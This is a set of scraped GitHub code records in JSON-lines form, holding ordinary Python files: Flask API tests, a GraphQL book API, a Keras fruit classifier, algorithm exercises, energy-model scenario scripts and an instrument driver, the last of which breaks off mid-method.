sens_summary[model['gage_id']] = model['ffc_metrics']\n df = pd.DataFrame(sens_summary)\n df.to_csv('data_outputs/sensitivity_summary_combo_mods.csv')\n import pdb; pdb.set_trace()\n # same plot for mid PI dT\n return \n ","repo_name":"NoellePatterson/climate_change_research","sub_path":"sensitivity_plots.py","file_name":"sensitivity_plots.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3041043107","text":"# basic tests for the functionality of the api\n\nimport os \nimport unittest\nimport sqlalchemy\nfrom application import app, db, Food, Category\n\nTEST_DB = \"test.db\"\n\nclass ModelFunctionality(unittest.TestCase):\n\t@classmethod\n\tdef setUpClass(self):\n\t\t# configurations\n\t\tapp.config[\"TESTING\"] = True\n\t\tapp.config[\"DEBUG\"] = False\n\t\tapp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + TEST_DB\n\t\n\t\tdb.drop_all()\n\t\tdb.create_all()\n\n\tdef tearDown(self):\n\t\tdb.session.rollback()\n\t\tfor category in Category.query.all():\n\t\t\tdb.session.delete(category)\n\t\t\tdb.session.commit()\n\n\t\tfor food in Food.query.all():\n\t\t\tdb.session.delete(food)\n\t\t\tdb.session.commit()\n\n\tdef test_category_object_exists(self):\n\t\trice_based = Category(name=\"rice_based\")\n\t\trice_based.save()\n\t\trice_based = Category.query.filter_by(name=\"rice_based\").one()\n\t\tself.assertIsInstance(rice_based, Category)\n\t\tself.assertEqual(\"rice_based\", rice_based.name)\n\n\tdef test_category_object_not_constructed_well(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\trice_based = Category()\n\t\t\trice_based.save()\n\n\tdef test_category_object_is_deleted(self):\n\t\tbean_based = Category(name=\"bean_based\")\n\t\tbean_based.save()\n\t\tbean_based = Category.query.filter_by(name=\"bean_based\").one()\n\t\tbean_based.remove()\n\n\t\tself.assertIsNone(Category.query.filter_by(name=\"bean_based\").first())\n\t\tself.assertEqual(0, len(Category.query.all()))\n\n\tdef test_category_is_unique(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tdrinks = Category(name=\"drinks\")\n\t\t\tdrinks.save()\n\t\t\twater = Category(name=\"drinks\")\n\t\t\twater.save()\n\n\tdef test_food_object_exists(self):\n\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\n\t\tfood.save()\n\t\tfood = Food.query.filter_by(name=\"jollof\").one()\n\t\tself.assertIsInstance(food, Food)\n\t\tself.assertEqual(\"jollof\", food.name)\n\n\tdef test_food_object_not_constructed_well(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1)\n\t\t\tfood.save()\n\n\n\tdef test_food_object_is_deleted(self):\n\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\tfood.save()\n\t\tjollof = Food.query.filter_by(name=\"jollof\").one()\n\t\tjollof.remove()\n\n\t\tself.assertIsNone(Category.query.filter_by(name=\"bean_based\").first())\n\t\tself.assertEqual(0, len(Category.query.all()))\n\n\tdef test_food_is_unique(self):\n\t\twith self.assertRaises(sqlalchemy.exc.IntegrityError):\n\t\t\tfood = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\tfood.save()\n\n\t\t\tdish = Food(name=\"jollof\", url=\"url\", category_id=1,\n \t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\", \n \t\t\tfat=\"678\", sodium=\"12\")\n\t\t\tdish.save()\n\n\nclass ApiFunctionality(unittest.TestCase):\n\n\t@classmethod\n\tdef setUpClass(self):\n\t\t# configurations\n\t\tapp.config[\"TESTING\"] = True\n\t\tapp.config[\"DEBUG\"] = False\n\t\tapp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + TEST_DB\n\t\tself.app = app.test_client()\n\t\tdb.drop_all()\n\t\tdb.create_all()\n\n\n\t\tself.FOOD_ITEM = \"soy_milk\"\n\t\tself.CATEGORY = \"beverages\"\n\t\tself.SINGLE_FOOD_URL = \"/api/foods/\" + self.FOOD_ITEM\n\t\tself.FOOD_BY_CATEGORY_URL = \"/api/food_category/\" + self.CATEGORY\n\t\tself.ALL_FOODS_URL = \"/api/foods\"\n\n\t\tcategory = Category(name=self.CATEGORY)\n\t\tcategory.save()\n\t\tfood = Food(name=self.FOOD_ITEM, url=\"url\", category_id=1, \n\t\t\tcalories=\"123\", carbs=\"678\", protein=\"78\", sugar=\"987\",\n\t\t\tfat=\"678\", sodium=\"12\")\n\t\tfood.save()\n\n\tdef test_index(self):\n\t\tresponse = self.app.get(\"/\", content_type=\"html/text\")\n\t\tself.assertEqual(response.status_code, 200)\n\t\t\n\tdef test_single_food_request(self):\n\t\tresponse = self.app.get(self.SINGLE_FOOD_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIn(self.FOOD_ITEM.encode(), response.data)\n\n\tdef test_bad_single_food_request(self):\n\t\tresponse = self.app.get(self.SINGLE_FOOD_URL + \"bleh bleh\")\n\t\tself.assertEqual(response.status_code, 404)\n\t\t\n\tdef test_category_request(self):\n\t\tresponse = self.app.get(self.FOOD_BY_CATEGORY_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIn(self.CATEGORY.encode(), response.data)\n\n\tdef test_bad_category_request(self):\n\t\tresponse = self.app.get(self.FOOD_BY_CATEGORY_URL + \"blehbleh\")\n\t\tself.assertEqual(response.status_code, 404)\n\n\tdef test_all_foods_request(self):\n\t\tresponse = self.app.get(self.ALL_FOODS_URL)\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertIsNotNone(response.data)\n\n\nif __name__ == \"__main__\":\n\tunittest.main()","repo_name":"Thompsonmina/Nigerian-Foods-Api","sub_path":"test_basics.py","file_name":"test_basics.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"23875405154","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n\r\n# 문제정리\r\n # 1.현재 칸이 청소되지 않은 경우 현재 칸 청소(방문 처리)\r\n # 2.주변 4칸이 청소할 곳이 없는 경우\r\n # 1.바라보는 방향에서 후진 가능하면(뒤쪽 벽x) 한칸 후진하고 1번 반복\r\n # 2. 바라보는 방향에서 뒤쪽이 벽이면 작동 멈춤\r\n # 3. 주변 4칸중 청소할 곳이 있는 경우\r\n # 1. 로봇 청소기를 반시계 방향으로 먼저 회전(ok)\r\n # 2. 앞쪽이 빈칸인 경우 한칸 전진 (ok)\r\n # 3. 1번 복귀 (ok)\r\n# 아이디어 BFS\r\n # 0 = 청소 안한 빈칸\r\n # 1 = 벽\r\n # 위 순서대로 돌리면서 청소한 칸 갯수 세주기\r\n # 로봇청소기가 방향을 갖고있다. -> 바라보는 방향을 계속 인지해야한다.\r\n\r\n\r\nN,M = list(map(int,input().split())) # 가로 세로 \r\nstartX,startY,direction = list(map(int,input().split())) # 시작점,방향\r\n# 방향 - > 0 : 북 1 : 동 2 : 남 3 : 서\r\n\r\nboard = [list(map(int,input().split())) for _ in range(N)]\r\n\r\ncnt = 0 # 정답 출력할 변수 == 청소하는 칸의 개수\r\n\r\n# 북 동 남 서\r\ndx = [-1,0,1,0] \r\ndy = [0,1,0,-1]\r\nx,y = startX,startY\r\n\r\nwhile True :\r\n # 최초 로봇청소기의 위치에서, 청소되지 않은 칸.\r\n if board[x][y] == 0 : # 1번 연산\r\n board[x][y] = 10 # 청소된 칸.\r\n cnt += 1\r\n unCleanedRoom = False\r\n nextDirection = False\r\n for i in range(4) :\r\n nx,ny = x+dx[i],y+dy[i]\r\n if board[nx][ny] == 0 : # 청소할 칸이 있따.\r\n unCleanedRoom = True\r\n break\r\n if unCleanedRoom == True : # 청소 안 된 빈 칸 있다.\r\n #반시계 회전.\r\n # 북 -> 서 0 -> 3\r\n # 서 - 남 3 -> 2\r\n # 남 -> 동 2 -> 1\r\n # 동 -> 북 1 -> 0\r\n if direction == 0 : nextDirection = 3\r\n else : nextDirection = direction - 1\r\n direction = nextDirection # 방향 바꿈\r\n nx,ny = x+dx[direction],y+dy[direction] # 전진\r\n if board[nx][ny] == 0 : # 청소할 수 있는 경우.\r\n x,y = nx,ny # 진짜로 전진한다.\r\n continue\r\n else : # 사방이 다 청소된 상태\r\n nx,ny = x-dx[direction],y-dy[direction] # 바라보는 방향 기준 한칸 후진한 좌표\r\n if board[nx][ny] != 1 : # 후진한 칸이 벽이 아니라면\r\n x,y = nx,ny # 진짜로 후진한다.\r\n continue # 다시 1번 수행으로 돌아간다.\r\n else : break # 후진을 할수 없다면\r\n \r\nprint(cnt)","repo_name":"wooryjoon/algorithms","sub_path":"백준/Gold/14503. 로봇 청소기/로봇 청소기.py","file_name":"로봇 청소기.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"17924974479","text":"# recebe as coordenadas x e y de um ponto\n# retorna se ela está dentro ou fora da região cinza\n# região: https://panda.ime.usp.br/aulasPython/static/aulasPython/exercicios/ex81a.html\n\ndef dentro(x,y):\n if x < 0: x = - x\n \n if (y > 5 and y < 6) and (x > 2 and x < 3): return \"dentro\"\n elif ((y >= 8 or y <= 0 or x >= 5)\n or ((y >= 4 and y <= 7) and (x >= 1 and x <=4))\n or ((y >= 1 and y <= 2) and (x <= 3))): \n return \"fora\"\n else: return \"dentro\"\n\nx = float(input())\ny = float(input())\n\nprint(dentro(x,y))\n","repo_name":"deboraprudencio/python","sub_path":"outros/ponto-regiao.py","file_name":"ponto-regiao.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7521192258","text":"import csv\r\nfrom ClasePlanAhorro import PlanAhorro\r\ndef LeerArchivo(Lista):\r\n archivo=open(\"C:\\\\Users\\\\augus\\\\Downloads\\\\Nueva carpeta\\\\Ejer5\\\\planes(1).csv\")\r\n reader=csv.reader(archivo,delimiter=\";\")\r\n for i in reader:\r\n cod=i[0]\r\n mod=i[1]\r\n vers=i[2]\r\n val=i[3]\r\n cuotasP=i[4]\r\n cuotasL=i[5]\r\n Plan=PlanAhorro(cod, mod, vers, val, cuotasP, cuotasL)\r\n Lista.append(Plan)\r\n archivo.close()\r\n","repo_name":"SantiagoFigueroa04/Ejercicios","sub_path":"Ejer 5/LeerArchivo.py","file_name":"LeerArchivo.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25257960118","text":"\"\"\"\nscript to create subscenarios for running individual countries in SAPP\n\"\"\"\n\nimport os\nimport pandas as pd\n\n# input csvs path\ninput_path = \"/Users/meas/Documents/gridpath-0.14.1/db/csvs_sapp_GPv0.14.1_workshop_072022\"\n\n# output csvs path\noutput_path = \"/Users/meas/Documents/gridpath-0.14.1/db/csvs_reds_102022\"\n\n# get project to load zone mapping\nproject_lz_file = os.path.join(input_path, \"project/project_load_zones/2_2.csv\") # subscenario 2 is used in base\nproject_lz_df = pd.read_csv(project_lz_file)\nun_lz = project_lz_df.load_zone.unique().tolist()\nun_lz = sorted(un_lz)\n\n# read in base portfolio file\nproject_portfolio_file = os.path.join(input_path, \"project/project_portfolios/100_project_portfolios_simple_re.csv\")\nproject_portfolio_df = pd.read_csv(project_portfolio_file)\n\n# loop through and create country-specific portfolios\nfor i in range(len(un_lz)):\n lz = un_lz[i]\n proj = project_lz_df[project_lz_df.load_zone == lz]\n un_proj = proj.project.unique().tolist()\n lz_portfolio = project_portfolio_df[project_portfolio_df.project.isin(un_proj)]\n\n subs_id = 101+i\n lz_portfolio.to_csv(os.path.join(output_path,\n \"project/project_portfolios\",\n str(subs_id) + \"_project_portfolios_simple_re_\" + lz + \".csv\"), index=False)\n\n# read in load zones file\nload_zones_file = os.path.join(input_path, \"system_load/load_zones/1_15zones.csv\")\nload_zones_df = pd.read_csv(load_zones_file)\n\n# loop through regions and create load zones files\nfor i in range(len(un_lz)):\n lz = un_lz[i]\n sub_lz = load_zones_df[load_zones_df.load_zone == lz]\n\n subs_id = 101 + i\n sub_lz.to_csv(os.path.join(output_path,\n \"system_load/load_zones\",\n str(subs_id) + \"_1zone_\" + lz + \".csv\"), index=False)\n","repo_name":"cetlab-ucsb/gridpath-technical-workshop","sub_path":"scripts/country-zones.py","file_name":"country-zones.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16516092268","text":"import pyJvsip as pjv\nL = 9\na=pjv.create('vview_f',L);\nb=a.empty\nab_bl=pjv.create('vview_bl',L);\na.ramp(-2.0,1)\nb.ramp(2.0,-1)\nprint('index A B\\n')\nfor i in range(L):\n print('%3i %7.1f %7.1f\\n'%(i,a[i],b[i]))\n_=pjv.leq(a,b,ab_bl)\nif ab_bl.anytrue:\n ab_vi=ab_bl.indexbool\n for i in range(ab_vi.length):\n print('A = B at index %3i\\n'%int(ab_vi[i]))\nelse:\n print('No true cases')\n","repo_name":"rrjudd/jvsip","sub_path":"python/pyJvsip_example/example15/example15.py","file_name":"example15.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"40377732014","text":"from Desc_Accesibilidad_BE import desc_AccesibilidadBE\nfrom DB_Desc_Accesibilidad_BE import Desc_AccesibilidadDB\n\ndef desc_accesibilidadAppAdmin():\n desc_accesibilidadbe=desc_AccesibilidadBE()\n desc_accesibilidaddb = Desc_AccesibilidadDB()\n print(\"Inicializando la app de Airbnb Residencia\")\n while True:\n Menu = \"\"\"\\nElija una de las siguientes opciones:\n 0-Salir de la app\n 1-Recuperar todos las descripciones\n 2-Ingresar una nueva descripción\n 3-Actualizar una descripción\n 4-Eliminar descripción\\n\"\"\"\n print(\"-\" * 100)\n print(Menu)\n print(\"-\" * 100)\n option = int(input(\"Opción: \"))\n\n if option == 0:\n print(\"\\nDeteniendo la aplicación de Airbnb Residencia\")\n # desc_accesibilidaddb.connection.close()\n break\n if option == 1:\n desc_accesibilidadbe.getAllDescription()\n if option == 2:\n desc_accesibilidadbe.addDescription()\n if option == 3:\n desc_accesibilidadbe.updateDescription()\n if option == 4:\n desc_accesibilidadbe.deleteDescription()\n\n# desc_accesibilidadAppAdmin()","repo_name":"DAP-web/AirbnbProyect","sub_path":"Segundo Avance/Formularios ABC/Desc_AccesibilidadApp_FE.py","file_name":"Desc_AccesibilidadApp_FE.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8065250259","text":"import os, random, math\nfrom pprint import pprint\nfrom datetime import datetime as dt\nimport numpy as np\nimport keras as k\n\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n\nSEED = 1337\nnp.random.seed(SEED)\n\nVALID_FRUITS = [\"Apricot\",\"Avocado\",\"Banana\",\"Chestnut\",\"Clementine\",\"Granadilla\",\"Kiwi\",\"Limes\",\n \"Mango\",\"Maracuja\",\"Peach\",\"Pear\",\"Pomegranate\",\"Raspberry\",\"Pineapple\",\"Strawberry\",\"Walnut\"]\n\nIMG_WIDTH=35\nIMG_HEIGHT=35\nTARGET_SIZE=[IMG_WIDTH, IMG_HEIGHT]\n\nCHANNELS=3\n\nTRAIN_PATH = \"/home/veerapandian/projects/fruits-360/Training\"\nTEST_PATH = \"/home/veerapandian/projects/fruits-360/Test\"\nPREDICTION_PATH = \"/home/veerapandian/projects/fruits-360/test-multiple_fruits\"\n\nBATCH_SIZE=32\nEPOCHS=20\n\ntrain_gen = k.preprocessing.image.ImageDataGenerator(rotation_range=0.1,width_shift_range=0.1,\n height_shift_range=0.1,brightness_range=[0.5, 1.5],\n channel_shift_range=0.05,rescale=1./255)\n\ntest_gen = k.preprocessing.image.ImageDataGenerator(rotation_range=0.1,width_shift_range=0.1,\n height_shift_range=0.1,brightness_range=[0.5, 1.5],\n channel_shift_range=0.05,rescale=1./255)\n\ntrain_images_iter = train_gen.flow_from_directory(TRAIN_PATH,target_size = TARGET_SIZE,classes = VALID_FRUITS,\n class_mode = 'categorical',seed = SEED)\n\ntest_images_iter = test_gen.flow_from_directory(TEST_PATH,target_size = TARGET_SIZE,classes = VALID_FRUITS,\n class_mode = 'categorical',seed = SEED)\n\ndef get_subplot_grid(mylist, columns, figwidth, figheight):\n plot_rows = math.ceil(len(mylist) / 2.)\n fig, ax = plt.subplots(plot_rows, 2, sharey=True, sharex=False)\n fig.set_figwidth(figwidth)\n fig.set_figheight(figheight)\n fig.subplots_adjust(hspace=0.4)\n axflat = ax.flat\n #remove the unused subplot, if any\n for ax in axflat[ax.size - 1:len(mylist) - 1:-1]:\n ax.set_visible(False)\n return fig, axflat\n\ntest_images_classes = [\"Avocado\",\"Kiwi\",\"Pear\",\"Pineapple\",\"Pomegranate\",\"Strawberry\"]\ntest_images=[]\n\nplt.rc('font',family = 'sans-serif', size=8)\nfig, axflat = get_subplot_grid(mylist=test_images_classes, columns=2, figwidth=4, figheight=6)\n\nfor idx, label in enumerate(test_images_classes):\n image_folder = os.path.join(TRAIN_PATH, label)\n image_file = os.path.join(image_folder, random.choice(os.listdir(image_folder)) )\n loaded_image = k.preprocessing.image.load_img(path=image_file,target_size=(IMG_WIDTH,IMG_HEIGHT,CHANNELS))\n #convert to array and resample dividing by 255\n img_array = k.preprocessing.image.img_to_array(loaded_image) / 255.\n test_images.append({\"idx\":idx, \"image\":img_array, \"label\": label})\n axflat[idx].set_title(label, size=12)\n axflat[idx].imshow(img_array)\nplt.show()\nplt.gcf().clear()\n\ntrained_classes_labels = list(train_images_iter.class_indices.keys())\ntrain_images_iter.class_indices\n\nunique, counts = np.unique(train_images_iter.classes, return_counts=True)\nprint (\"number of samples per class\")\ndict(zip(train_images_iter.class_indices, counts))\n\ndef build_model():\n rtn = k.Sequential()\n rtn.add(k.layers.Conv2D(filters = 64, kernel_size = (3,3), padding = 'same', strides=(1, 1),\n input_shape = (IMG_WIDTH, IMG_HEIGHT, CHANNELS),\n kernel_regularizer=k.regularizers.l2(0.0005),\n name='conv2d_1'\n )\n )\n rtn.add(k.layers.BatchNormalization())\n rtn.add(k.layers.Activation('relu', name='activation_conv2d_1'))\n rtn.add(k.layers.SpatialDropout2D(0.2))\n rtn.add(k.layers.Conv2D(filters = 128, kernel_size = (3,3), padding = 'same', name='conv2d_2'))\n rtn.add(k.layers.BatchNormalization())\n rtn.add(k.layers.LeakyReLU(0.5, name='activation_conv2d_2'))\n rtn.add(k.layers.MaxPooling2D(pool_size = (2,2)))\n rtn.add(k.layers.Flatten())\n rtn.add(k.layers.Dense(units = 250, name='dense_1' ) )\n rtn.add(k.layers.Activation('relu', name='activation_dense_1'))\n rtn.add(k.layers.Dropout(0.5))\n rtn.add(k.layers.Dense(units = len(trained_classes_labels), name='dense_2'))\n rtn.add(k.layers.Activation('softmax', name='activation_final'))\n return rtn\n\nmy_model = build_model()\nmy_model.compile(loss = 'categorical_crossentropy',metrics = ['accuracy'],\n optimizer = k.optimizers.RMSprop(lr = 1e-4, decay = 1e-6))\n\nstart = dt.now()\nhistory = my_model.fit_generator(\n train_images_iter,\n steps_per_epoch = train_images_iter.n // BATCH_SIZE, #floor per batch size\n epochs = EPOCHS,\n validation_data = test_images_iter,\n validation_steps = test_images_iter.n // BATCH_SIZE,\n verbose = 1,\n callbacks = [\n #early stopping in case the loss stops decreasing\n k.callbacks.EarlyStopping(monitor='val_loss', patience=3),\n # only save the model if the monitored quantity (val_loss or val_acc) has improved\n k.callbacks.ModelCheckpoint(\"fruits_checkpoints.h5\", monitor='val_loss', save_best_only = True),\n # only needed for visualising with TensorBoard\n k.callbacks.TensorBoard(log_dir = \"logs/{:%d_%b_%Y_%H:%M:%S}\".format(dt.now()) )\n ]\n)\nprint(history.history.keys())\n\nplt.style.use('fivethirtyeight')\n\nxepochs = [i+1 for i in range(0, len(history.history['loss']))]\nplt.figure(figsize=(5,3))\n# Loss\n#plt.ylim([-0.1,0.5])\nplt.plot(xepochs, history.history['loss'])\nplt.plot(xepochs, history.history['val_loss'])\nplt.xticks(xepochs)\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['training', 'validation'], loc='upper left')\nplt.show()\n\n# Accuracy\n#plt.ylim([0.7,1.05])\n# plt.figure(figsize=(5,3))\n# plt.plot(xepochs, history.history['acc'])\n# plt.plot(xepochs, history.history['val_acc'])\n# plt.xticks(xepochs)\n# plt.title('model accuracy')\n# plt.ylabel('accuracy')\n# plt.xlabel('epoch')\n# plt.legend(['training', 'validation'], loc='upper left')\n# plt.show()\n\ndf_out = {'val_loss': history.history['val_loss'][0],'val_acc': history.history['val_accuracy'][0],\n 'elapsed_time': (dt.now() - start).seconds}\nprint(df_out)\n\nmy_model=build_model()\nmy_model.load_weights(\"fruits_checkpoints.h5\")\nmy_model.compile(loss = 'categorical_crossentropy', \n metrics = ['accuracy'], \n optimizer = k.optimizers.RMSprop(lr = 1e-4, decay = 1e-6)\n )\nprint(\"Created model and loaded weights from file\")\n\nmy_model.summary()\n\nPREDICTION_PATH = \"/home/veerapandian/projects/fruits-360/sample\"\nimages_for_prediction = [filename for filename in sorted(os.listdir(PREDICTION_PATH)) if filename.endswith(\".jpg\")]\n\nfor filename in images_for_prediction:\n loaded_image = k.preprocessing.image.load_img(path=PREDICTION_PATH+'/'+filename, target_size=(IMG_WIDTH,IMG_HEIGHT,CHANNELS))\n #convert to array and resample dividing by 255\n img_array = k.preprocessing.image.img_to_array(loaded_image) / 255.\n\n #add sample dimension. the predictor is expecting (1, CHANNELS, IMG_WIDTH, IMG_HEIGHT)\n img_np_array = np.expand_dims(img_array, axis = 0)\n #img_class = my_model.predict_classes(img_np_array)\n\n predictions = my_model.predict(img_np_array)\n classidx = np.argmax(predictions[0])\n label = trained_classes_labels[classidx]\n\n predictions_pct = [\"{:.2f}%\".format(prob * 100) for prob in predictions[0] ]\n pprint(dict(zip(trained_classes_labels, predictions_pct)) )\n print(\"Prediction: %s (class %s) %s\" % (label, classidx, predictions_pct[classidx])) \n\n plt.figure(figsize=(3,4))\n plt.imshow(img_array)\n plt.title(\"%s %s\" % (label, predictions_pct[classidx]))\n plt.show()\n\nplt.gcf().clear()\n","repo_name":"veerapandian22/Deep-Learning","sub_path":"cnn_keras.py","file_name":"cnn_keras.py","file_ext":"py","file_size_in_byte":7831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4088749689","text":"import os\nfrom ariadne import QueryType, MutationType,graphql_sync, make_executable_schema\nfrom ariadne.constants import PLAYGROUND_HTML\nfrom flask import Flask, request, jsonify\n\nfrom models import db, ma\nfrom models.author import Author\nfrom models.book import Book\nfrom models.authorSchema import AuthorSchema\nfrom models.bookSchema import BookSchema\nfrom schemas.type_defs import type_defs, datetime_scalar\n\n\nauthor_schema = AuthorSchema()\nauthors_schema = AuthorSchema(many=True)\n\nbook_schema = BookSchema()\nbooks_schema = BookSchema(many=True)\n\nquery = QueryType()\nmutation = MutationType()\n\n\n@query.field(\"authors\")\ndef resolve_authors(_, info):\n data = Author.query.all()\n return authors_schema.dump(data)\n\n@query.field(\"author\")\ndef resolve_author(_, info, id):\n data = Author.query.get(id)\n return author_schema.dump(data)\n\n@query.field(\"books\")\ndef resolve_books(_, info):\n data = Book.query.all()\n return books_schema.dump(data)\n\n@query.field(\"book\")\ndef resolve_book(_, info, id):\n data = Book.query.get(id)\n return book_schema.dump(data)\n\n@mutation.field(\"addAuthor\")\ndef resolve_add_author(_, info, name, lastname):\n author = Author(name=name, lastname=lastname)\n db.session.add(author)\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"addBook\")\ndef resolve_add_book(_, info, title, author_id):\n author = Author.query.get(author_id)\n book = Book(title=title, author=author)\n db.session.add(book)\n db.session.commit()\n return book_schema.dump(book)\n\n@mutation.field(\"updateAuthor\")\ndef resolve_update_author(_, info, id, name, lastname):\n author = Author.query.get(id)\n author.name = name\n author.lastname = lastname\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"updateBook\")\ndef resolve_update_book(_, info, id, title):\n book = Book.query.get(id)\n book.title = title\n db.session.commit()\n return book_schema.dump(book)\n\n@mutation.field(\"deleteAuthor\")\ndef resolve_delete_author(_, info, id):\n author = Author.query.get(id)\n db.session.delete(author)\n db.session.commit()\n return author_schema.dump(author)\n\n@mutation.field(\"deleteBook\")\ndef resolve_delete_book(_, info, id):\n book = Book.query.get(id)\n book.author = None\n db.session.delete(book)\n db.session.commit()\n return book_schema.dump(book)\n\nschema = make_executable_schema(type_defs, [query, mutation, datetime_scalar])\n\napp = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"mysql+pymysql://{}@{}:{}/{}\".format(os.environ.get(\"USER\"), os.environ.get(\"HOST\"), os.environ.get(\"PORT\"), os.environ.get(\"DATABASE\"))\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb.init_app(app)\nma.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route(\"/graphql\", methods=[\"GET\"])\ndef graphql_playground():\n return PLAYGROUND_HTML, 200\n\n\n@app.route(\"/graphql\", methods=[\"POST\"])\ndef graphql_server():\n data = request.get_json()\n\n success, result = graphql_sync(\n schema,\n data,\n context_value=request,\n debug=app.debug\n )\n\n status_code = 200 if success else 400\n return jsonify(result), status_code\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"AlegreCode/tutorial-flask-ariadne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72948552742","text":"import os\nfrom setuptools import setup\n\nTEST_DEPENDENCIES = [\n \"black==20.8b1\",\n \"flake8==3.9.0\",\n \"pytest==6.2.3\",\n \"pytest-cov==2.11.1\",\n]\n\nwith open(os.path.join(os.path.abspath(os.path.dirname(__file__)), \"README.md\"), encoding=\"utf-8\") as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=\"pytoschema\",\n description=\"A package to convert Python type annotations into JSON schemas\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n version=\"2.0.0\",\n author=\"Carlos Ruiz Lantero\",\n author_email=\"carlos.ruiz.lantero@comprehensivetech.co.uk\",\n maintainer=\"Carlos Ruiz Lantero\",\n maintainer_email=\"carlos.ruiz.lantero@comprehensivetech.co.uk\",\n url=\"https://github.com/comprehensivetech/pytoschema\",\n packages=[\"pytoschema\"],\n classifiers=[\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n tests_require=TEST_DEPENDENCIES,\n extras_require={\"test\": TEST_DEPENDENCIES},\n)\n","repo_name":"Lantero/pytoschema","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20505916410","text":"#\n# LSST / LPNHE\n# Author: Laurent Le Guillou\n#\n\"\"\"\nTestbench driver for the Keithley multimeter \n(through keithley-server and XML-RPC).\n\"\"\"\n\n# XML-RPC interface:\n#\n# # General Control Functions \n# server.register_function(keithley.status, \"status\")\n# server.register_function(keithley.open, \"open\")\n# server.register_function(keithley.close, \"close\")\n# server.register_function(keithley.reset, \"reset\")\n# server.register_function(keithley.clear, \"clear\")\n# server.register_function(keithley.get_serial, \"get_serial\")\n# server.register_function(keithley.get_serial, \"checkConnection\")\n\n# # Keithley generic command\n# server.register_function(keithley.send, \"send\")\n# server.register_function(keithley.get_error_status, \"get_error_status\")\n\n# # misc \n# server.register_function(keithley.scroll_text, \"scroll_text\")\n# server.register_function(server_quit, \"quit\")\n\n# # for remote introspection (tab completion with ipython)\n# server.register_function(keithley._listMethods, \"__dir__\")\n# server.register_function(keithley._listMethods, \"system.listMethods\")\n# server.register_function(keithley._listMethods, \"trait_names\")\n# server.register_function(keithley._listMethods, \"_getAttributeNames\")\n# # TODO: implement: system.methodSignature\n# server.register_function(keithley._methodHelp, \"system.methodHelp\")\n\nfrom driver import Driver\n\nimport xmlrpclib\nimport logging\n\n# =======================================================================\n\nclass Instrument(Driver):\n\n # ===================================================================\n # Generic methods (init, open, etc)\n # ===================================================================\n\n def __init__(self, identifier, **kargs):\n Driver.__init__(self, identifier, **kargs)\n \n # self.identifier = identifier\n # self.host = host\n # self.device = device\n # self.port = port # XML-RPC port\n\n if 'host' not in kargs.keys():\n raise ValueError(\"host is requested\")\n\n if 'devices' not in kargs.keys():\n raise ValueError(\"devices is requested\")\n\n if 'port' not in kargs.keys():\n raise ValueError(\"port is requested\")\n\n self.xmlrpc = xmlrpclib.ServerProxy(\"http://%s:%d/\" % \n (self.host, self.port))\n\n self.lastmeasure = 0.0 # None should be better ?\n\n\n def open(self):\n \"\"\"\n 